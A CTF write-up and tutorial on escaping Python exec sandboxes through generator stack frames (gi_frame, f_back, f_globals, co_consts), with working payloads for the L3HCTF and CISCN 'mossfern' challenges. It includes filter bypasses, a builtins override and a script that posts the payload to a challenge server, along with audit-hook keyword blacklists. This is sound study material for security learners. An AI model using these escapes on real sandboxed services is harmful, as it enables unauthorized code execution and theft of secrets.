Python sandbox escape via stack frames
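Generators
A generator is a special kind of iterator in Python, defined with the `yield` keyword.
`yield` produces a value and suspends the function while preserving its current state. The next time the generator is advanced, execution resumes from where it was suspended and runs until the next `yield` statement or until the function ends.

```python
def f():
    a = 1
    while True:
        yield a
        a += 1

f = f()
print(next(f))
print(next(f))
print(next(f))
```

Replacing `while` with `for` defines a finite iterator:

```python
def f():
    a = 1
    for i in range(100):
        yield a
        a += 1

f = f()
```

A loop can traverse the iterator:

```python
for value in f:
    print(value)
```

A generator expression creates a generator concisely, without writing `yield`:

```python
a = (i + 1 for i in range(100))

for value in a:
    print(value)
```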
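Built-in attributes of a generator:
- `gi_code`: the code object that backs the generator.
- `gi_frame`: the frame (stack frame) object of the generator.
- `gi_running`: whether the generator is currently executing. After a `yield`, and before the line following that `yield` runs, the generator is frozen (suspended) and this attribute is `False` (0).
- `gi_yieldfrom`: the object the generator is currently delegating to via `yield from`, or `None` if there is none.
- `gi_frame.f_locals`: a dictionary holding the local variables of the generator's current frame.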
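As a quick illustration of the attributes listed above, here is a minimal sketch that inspects a suspended generator. The `counter` function and the variable names are made up for this example.

```python
def counter():
    total = 0
    while True:
        total += 1
        yield total

gen = counter()
first = next(gen)                            # run up to the first yield

code_name = gen.gi_code.co_name              # name stored in the code object
is_running = gen.gi_running                  # False while suspended at a yield
saved_locals = dict(gen.gi_frame.f_locals)   # snapshot of the frame's locals
delegate = gen.gi_yieldfrom                  # None: no "yield from" in progress

print(code_name, is_running, saved_locals, delegate)
```

The local variable `total` stays readable from outside the generator through `gi_frame.f_locals`, which is what makes the frame interesting for the escapes discussed later.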
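Using gi_frame
`gi_frame` points to the frame object of the generator (coroutines expose the equivalent as `cr_frame`), as long as the generator has not finished; once it has finished, `gi_frame` is `None`. A frame object represents the current execution context and holds the local variables, the bytecode being executed, and related information.
Every time the Python interpreter executes a function or method, it creates a new stack frame that stores the local variables, arguments, return address, and other execution state for that call. These frames are linked in call order into a stack, known as the call stack.
For example, `gi_frame` combined with the following frame attributes can be used to read variables that are otherwise out of reach: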
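- `f_locals`: a dictionary of the function's or method's local variables. Keys are variable names, values are the variables' values.
- `f_globals`: a dictionary of the global variables of the module in which the function or method was defined. Keys are global names, values are their values.
- `f_code`: a code object containing the bytecode, constants, variable names, and so on of the function or method.
- `f_lasti`: an integer, the index of the last bytecode instruction executed.
- `f_back`: a reference to the previous (calling) frame, used to build the call stack.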
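To make the `f_back` chain concrete, the sketch below walks the call stack from the innermost frame outward and records each frame's function name. It relies on `sys._getframe()`, which is a CPython implementation detail; the function names are invented for the example.

```python
import sys

def frame_names():
    """Return the function names on the call stack, innermost first."""
    names = []
    frame = sys._getframe()          # the frame of frame_names itself
    while frame is not None:
        names.append(frame.f_code.co_name)
        frame = frame.f_back         # step to the caller's frame
    return names

def inner():
    return frame_names()

def outer():
    return inner()

stack = outer()
print(stack[:3])
```

Each step through `f_back` moves one caller up, which is exactly the walk the sandbox escapes below perform, only starting from a generator's frame instead of `sys._getframe()`.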
Sandbox escape with stack frames and f_back
example1:
```python
s3cret = "this is flag"

codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back

    g = f()  # the generator
    frame = next(g)  # frame yielded by the generator (here: waff's frame)
    b = frame.f_back.f_back.f_globals['s3cret']  # walk back to the outer frames and read their globals
    return b

b = waff()
'''
locals = {}
code = compile(codes, "test", "exec")
exec(code, locals)
print(locals["b"])
```
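Starting from the generator's frame object and following `f_back` (which returns the previous frame), the code escapes the sandbox and reaches the outer global symbol table. Running it prints `this is flag`: the escape succeeds and the value of `s3cret` is read.
`next(g)` calls the `__next__()` method of generator `g`, which starts executing it until it hits a `yield`. The value obtained here is `g.gi_frame.f_back`. `locals` is the namespace of the sandbox.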
The following example2, however, raises an error. Why?
```python
s3cret = "this is flag"

codes = '''
def waff():
    def f():
        yield g.gi_frame

    g = f()  # the generator
    frame = next(g)  # the generator's own frame object
    b = frame.f_back.f_back.f_back.f_globals['s3cret']  # frame.f_back is already None here
    return b

b = waff()
'''
locals = {}
code = compile(codes, "test", "exec")
exec(code, locals)
print(locals["b"])
```
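In example1: `g.gi_frame.f_back` is evaluated while the generator is running, so it points to the `waff` frame; `frame.f_back` then points to the frame of the exec'd `test` sandbox code, and `frame.f_back.f_back` points to the frame of the main module.
In example2: `g.gi_frame` points to the frame of `f`. Once `f` yields, the generator is suspended and its frame is detached from the call stack, so by the time `waff` uses it, `frame.f_back` is `None` and the next `.f_back` access fails.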
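The difference between the two examples can be checked directly. The sketch below (names are illustrative) reads `gi_frame.f_back` once from inside the running generator and once after it has been suspended.

```python
def make_probe():
    def probe():
        # While the generator body runs, its frame is linked to its caller.
        yield gen.gi_frame.f_back is not None

    gen = probe()
    linked_while_running = next(gen)
    # After the yield the generator is suspended and detached from the stack.
    linked_while_suspended = gen.gi_frame.f_back is not None
    return linked_while_running, linked_while_suspended

running, suspended = make_probe()
print(running, suspended)
```

This is why the `f_back` walk has to start inside the generator body: the link to the caller only exists while the generator is executing.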
So the following code also works, as long as the whole `f_back` walk happens while the frames are still linked:
```python
s3cret = "this is flag"

codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back.f_back.f_back

    g = f()  # the generator
    frame = next(g)  # the yielded value is already the main module's frame
    b = frame.f_globals['s3cret']  # read the globals of that frame directly
    return b

b = waff()
'''
locals = {}
code = compile(codes, "test", "exec")
exec(code, locals)
print(locals["b"])
```
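Here the string `s3cret` is a global variable and, because it lives at module level, also a local variable of that module-level frame, so it can be read with `f_locals['s3cret']` as well.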
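The claim that module-level code sees the same names through `f_locals` and `f_globals` can be verified with a small sketch. It runs a snippet with `exec` in a fresh namespace and uses the CPython-specific `sys._getframe()`; the file name `demo` and the variable names are arbitrary.

```python
source = '''
import sys
frame = sys._getframe()                      # frame of this module-level code
same_dict = frame.f_locals is frame.f_globals
via_locals = frame.f_locals["s3cret"]
'''

namespace = {"s3cret": "this is flag"}
exec(compile(source, "demo", "exec"), namespace)

print(namespace["same_dict"], namespace["via_locals"])
```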
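Once the globals are available, the next step is to fetch `__builtins__`. The `__builtins__` module is loaded automatically when the Python interpreter starts and contains the built-in functions, exceptions, and other built-in objects.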
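A minimal sketch of that step follows. In CPython, the `__builtins__` entry of a globals dictionary is the `builtins` module in `__main__` and usually a plain dictionary elsewhere, so the hypothetical helper `builtins_namespace` handles both cases.

```python
import sys

def builtins_namespace(frame):
    """Return the builtins reachable from `frame` as a dictionary."""
    entry = frame.f_globals["__builtins__"]
    # Module in __main__, plain dict in most other modules (CPython detail).
    return entry if isinstance(entry, dict) else vars(entry)

table = builtins_namespace(sys._getframe())
recovered_len = table["len"]
print(recovered_len("abc"))
```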
Example challenge: L3HCTF
The source is shown below; `codes` comes from user input:
```python
import sys
import os

codes='''
<<codehere>>
'''

try:
    codes.encode("ascii")
except UnicodeEncodeError:
    exit(0)

if "__" in codes:
    print("__ bypass!!")
    exit(0)

codes+="\nres=factorization(c)"
print(codes)
locals={"c":"696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863","__builtins__": None}
res=set()

def blackFunc(oldexit):
    def func(event, args):
        blackList = ["process","os","sys","interpreter","cpython","open","compile","__new__","gc"]
        for i in blackList:
            if i in (event + "".join(str(s) for s in args)).lower():
                print("noooooooooo")
                print(i)
                oldexit(0)
    return func

code = compile(codes, "<judgecode>", "exec")
sys.addaudithook(blackFunc(os._exit))
exec(code,{"__builtins__": None},locals)
print(locals)
p=int(locals["res"][0])
q=int(locals["res"][1])
if(p>1e5 and q>1e5 and p*q==int("696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863")):
    print("Correct!",end="")
else:
    print("Wrong!",end="")
```
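The sandbox sets `__builtins__` to `None`, which blocks the usual follow-up exploitation. An audit hook also blacklists several sensitive keywords, so the `gc` garbage collector cannot be used to obtain object references and `os` cannot be called directly.
We pass the following code to first obtain the globals outside the sandbox: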
```python
a=(a.gi_frame.f_back.f_back for i in [1])
a=[x for x in a][0]
globals=a.f_back.f_back.f_globals
```
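Why use `[x for x in a][0]`?
Normally `next` would be used to obtain `g.gi_frame.f_back`, but `next` is part of the builtins and was banned along with them, so a `for` is used instead (`for ... in` also just iterates over the iterator).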
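The point about `next` versus `for` can be reproduced in isolation. The sketch below runs two tiny snippets with `__builtins__` set to `None`: one advances a generator with a list comprehension, the other tries to call `next`. The snippet contents are invented for illustration.

```python
sandbox_ok = '''
gen = (i * 2 for i in [21])
first = [x for x in gen][0]     # iteration syntax needs no builtin name
'''

sandbox_fail = '''
gen = (i * 2 for i in [21])
first = next(gen)               # `next` must be looked up in the builtins
'''

ok_ns = {"__builtins__": None}
exec(sandbox_ok, ok_ns)

try:
    exec(sandbox_fail, {"__builtins__": None})
    next_failed = False
except Exception:               # the exact exception type is not relied on
    next_failed = True

print(ok_ns["first"], next_failed)
```

Iteration is compiled to bytecode that drives the iterator directly, so it keeps working even when no builtin function can be resolved.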
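The challenge requires the factorization (via the official `factorization`) to finish within 5 s, which is completely infeasible.
`"_"*2+"builtins"+"_"*2` is used to bypass the filter on `__`.
As an aside, in the Huawei Cup AWDP I played earlier, a filter on `os` was bypassed with `"o"+"s"`.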
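Both bypasses work because the filter inspects the source text while the forbidden string only comes into existence at run time. A small sketch, with a hypothetical `naive_filter` standing in for the challenge's check:

```python
def naive_filter(source):
    """Hypothetical blacklist: accept source only if it lacks "__" and "os"."""
    return "__" not in source and "os" not in source

payload = '''key = "_"*2 + "builtins" + "_"*2
mod = "o" + "s"'''

passes = naive_filter(payload)   # the raw text contains neither substring

ns = {}
exec(payload, ns)                # the strings are assembled only when executed
print(passes, ns["key"], ns["mod"])
```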
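Only the `__builtins__` inside the sandbox was removed, not the one outside, so the idea is to step back to a frame outside the sandbox first and then fetch the builtins from there.
Through the `__builtins__` entry of the outer globals, the `int` function is then replaced so that it returns a fixed p*q result: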
```python
def fake_int(i):
    return 100001 * 100002
a=(a.gi_frame.f_back.f_back for i in [1])
a=[x for x in a][0]
builtin =a.f_back.f_back.f_globals["_"*2+"builtins"+"_"*2]
builtin.int=fake_int
```
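The effect of assigning to an attribute of the builtins module can be seen outside any sandbox. This is a sketch only: it patches `builtins.int` briefly, restores it in a `finally` block, and uses the made-up helpers `parse` and `fake_int` with an arbitrary return value.

```python
import builtins

def parse(text):
    # `int` is not defined in this module, so the lookup falls through
    # to the builtins namespace every time parse() runs.
    return int(text)

def fake_int(value):
    return 42                      # arbitrary fixed result for illustration

original_int = builtins.int
before = parse("7")
builtins.int = fake_int            # same kind of assignment as in the payload
try:
    during = parse("7")
finally:
    builtins.int = original_int    # always restore the real built-in
after = parse("7")

print(before, during, after)
```

Because the host script resolves `int` through the same builtins namespace, a replacement installed from inside the sandbox also changes what the host's own later `int(...)` calls return.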
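2024 CISCN mossfern: online code execution?
The attachment provides two source files; as before, the comments are kept in the code for easier reading.
main.py: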
```python
import os
import subprocess
from flask import Flask, request, jsonify
from uuid import uuid1

app = Flask(__name__)

runner = open("/app/runner.py", "r", encoding="UTF-8").read()
flag = open("/flag", "r", encoding="UTF-8").readline().strip()


@app.post("/run")
def run():
    id = str(uuid1())
    try:
        data = request.json
        open(f"/app/uploads/{id}.py", "w", encoding="UTF-8").write(
            runner.replace("THIS_IS_SEED", flag).replace("THIS_IS_TASK_RANDOM_ID", id))
        open(f"/app/uploads/{id}.txt", "w", encoding="UTF-8").write(data.get("code", ""))
        run = subprocess.run(
            ['python', f"/app/uploads/{id}.py"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            timeout=3
        )
        result = run.stdout.decode("utf-8")
        error = run.stderr.decode("utf-8")
        print(result, error)

        if os.path.exists(f"/app/uploads/{id}.py"):
            os.remove(f"/app/uploads/{id}.py")
        if os.path.exists(f"/app/uploads/{id}.txt"):
            os.remove(f"/app/uploads/{id}.txt")
        return jsonify({
            "result": f"{result}\n{error}"
        })
    except:
        if os.path.exists(f"/app/uploads/{id}.py"):
            os.remove(f"/app/uploads/{id}.py")
        if os.path.exists(f"/app/uploads/{id}.txt"):
            os.remove(f"/app/uploads/{id}.txt")
        return jsonify({
            "result": "None"
        })


if __name__ == "__main__":
    app.run("0.0.0.0", 5000)
```
runner.py:
```python
def source_simple_check(source):
    """
    Check the source with pure string in string, prevent dangerous strings
    :param source: source code
    :return: None
    """

    from sys import exit
    from builtins import print

    try:
        source.encode("ascii")
    except UnicodeEncodeError:
        print("non-ascii is not permitted")
        exit()

    for i in ["__", "getattr", "exit"]:
        if i in source.lower():
            print(i)
            exit()


def block_wrapper():
    """
    Check the run process with sys.audithook, no dangerous operations should be conduct
    :return: None
    """

    def audit(event, args):

        from builtins import str, print
        import os

        for i in ["marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"]:
            if i in (event + "".join(str(s) for s in args)).lower():
                print(i)
                os._exit(1)
    return audit


def source_opcode_checker(code):
    """
    Check the source in the bytecode aspect, no methods and globals should be load
    :param code: source code
    :return: None
    """

    from dis import dis
    from builtins import str
    from io import StringIO
    from sys import exit

    opcodeIO = StringIO()
    dis(code, file=opcodeIO)
    opcode = opcodeIO.getvalue().split("\n")
    opcodeIO.close()
    for line in opcode:
        if any(x in str(line) for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]):
            if any(x in str(line) for x in ["randint", "randrange", "print", "seed"]):
                break
            print("".join([x for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"] if x in str(line)]))
            exit()


if __name__ == "__main__":

    from builtins import open
    from sys import addaudithook
    from contextlib import redirect_stdout
    from random import randint, randrange, seed
    from io import StringIO
    from random import seed
    from time import time

    source = open(f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt", "r").read()
    source_simple_check(source)
    source_opcode_checker(source)
    code = compile(source, "<sandbox>", "exec")
    addaudithook(block_wrapper())
    outputIO = StringIO()
    with redirect_stdout(outputIO):
        seed(str(time()) + "THIS_IS_SEED" + str(time()))
        exec(code, {
            "__builtins__": None,
            "randint": randint,
            "randrange": randrange,
            "seed": seed,
            "print": print
        }, None)
    output = outputIO.getvalue()

    if "THIS_IS_SEED" in output:
        print("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!")
        print("bad code-operation why still happened ah?")
    else:
        print(output)
```
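The flow of the code is simple:
- The placeholders in runner.py are replaced, `THIS_IS_SEED` with the flag and `THIS_IS_TASK_RANDOM_ID` with the id, and the result is saved as `{id}.py`.
- The `/run` route accepts JSON parameters; the value of the `code` key is saved as source code to `{id}.txt`, and `{id}.py` is then run to execute `{id}.txt`.
In runner.py the flag is the string that replaces `THIS_IS_SEED`. The `flag` variable itself is defined in the main (Flask) process, and a sandbox escape cannot cross from the child process into the parent process, but after the replacement the flag is already embedded in the runner.py process.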
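Next, work out how many `f_back` levels are needed by sketching the call stack. From the innermost frame outward, and assuming the list comprehension runs in its own frame (as it does before Python 3.12), it is: generator `scq`, the list comprehension, `exp`, the `<sandbox>` module code, and the main module of runner.py.
The generator yields its caller's frame, so three more levels of `f_back` get back to the main module.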
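How do we read the flag once we are there?
In Python, `co_consts` is an attribute of a compiled code object. It contains all the constants defined in the bytecode. Because the flag was substituted into runner.py as a string literal, it appears in the `co_consts` of the main module's code object, which is reachable through that frame's `f_code`.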
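The following sketch mimics the substitution on a one-line template and shows the literal ending up in `co_consts`. The template line and the value `flag{demo}` are placeholders for illustration, not the real challenge data; the code is only compiled, never executed.

```python
template = 'seed("THIS_IS_SEED")'
generated = template.replace("THIS_IS_SEED", "flag{demo}")  # placeholder flag

code = compile(generated, "<runner-demo>", "exec")

# String literals from the source are stored as constants of the code object.
string_consts = [c for c in code.co_consts if isinstance(c, str)]
print(string_consts)
```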
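Finally, if the flag appears in the output, the output is suppressed.
Printing the characters one at a time with the `end` parameter of `print`, separated by commas, is enough to get around that.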
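Here is a minimal sketch of why the comma trick defeats a substring check on the captured output. It captures output with `redirect_stdout` the way the runner does; `flag{demo}` is a stand-in value.

```python
import io
from contextlib import redirect_stdout

secret = "flag{demo}"            # stand-in for the real flag

buffer = io.StringIO()
with redirect_stdout(buffer):
    for ch in secret:
        print(ch, end=",")       # one character at a time, comma-separated
output = buffer.getvalue()

blocked = secret in output                # the kind of check the runner does
recovered = output.replace(",", "")       # done by the attacker afterwards
print(blocked, recovered)
```

Stripping the separator only works cleanly when the secret itself contains no commas, which holds for this stand-in value.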
The full script:

```python
import requests

url = 'http://8e890316-d92c-4777-88d8-0cc1bddb35a3.challenge.ctf.show/run'
data = {
    "code": '''
def exp():
    def scq():
        yield scq.gi_frame.f_back

    scq = scq()
    frame = [x for x in scq][0]
    gattr = frame.f_back.f_back.f_back.f_globals['_'+'_builtins_'+'_']# jail
    s = gattr.str
    for i in s(frame.f_back.f_back.f_back.f_code.co_consts):
        print(i, end = ",")
exp()
'''
}

response = requests.post(url, json=data)
print(response.json())
```
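Locally, the same payload does not produce the flag, for reasons I have not pinned down. One possible cause (an unverified guess): since Python 3.12 list comprehensions are inlined (PEP 709) and no longer get their own frame, which changes how many `f_back` levels are needed.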